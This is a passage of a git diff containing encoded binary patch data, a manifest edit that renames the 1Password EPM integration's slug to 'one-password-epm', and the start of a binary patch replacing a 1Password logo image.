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

diff --git a/1Password/1password-epm/_meta/manifest.yml b/1Password/1password-epm/_meta/manifest.yml
index decfb3ddd..f2f07105a 100644
--- a/1Password/1password-epm/_meta/manifest.yml
+++ b/1Password/1password-epm/_meta/manifest.yml
@@ -1,6 +1,6 @@
 uuid: 09754cc4-e247-4712-9a76-25529ba11b8b
 name: 1Password EPM
-slug: 1password-epm
+slug: one-password-epm
 automation_connector_uuid: f3330ea4-e492-4c57-9764-d2dcf1d044eb
 automation_module_uuid: 56f9e1f6-95ba-45ed-867b-44fb3183934d
 
diff --git a/1Password/_meta/logo.png b/1Password/_meta/logo.png
index d8fbd396e5dd798f4530be439b902acae10c5f19..893464ee20a2839903579d283f002b6df4858434 100644
GIT binary patch
literal 28013
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
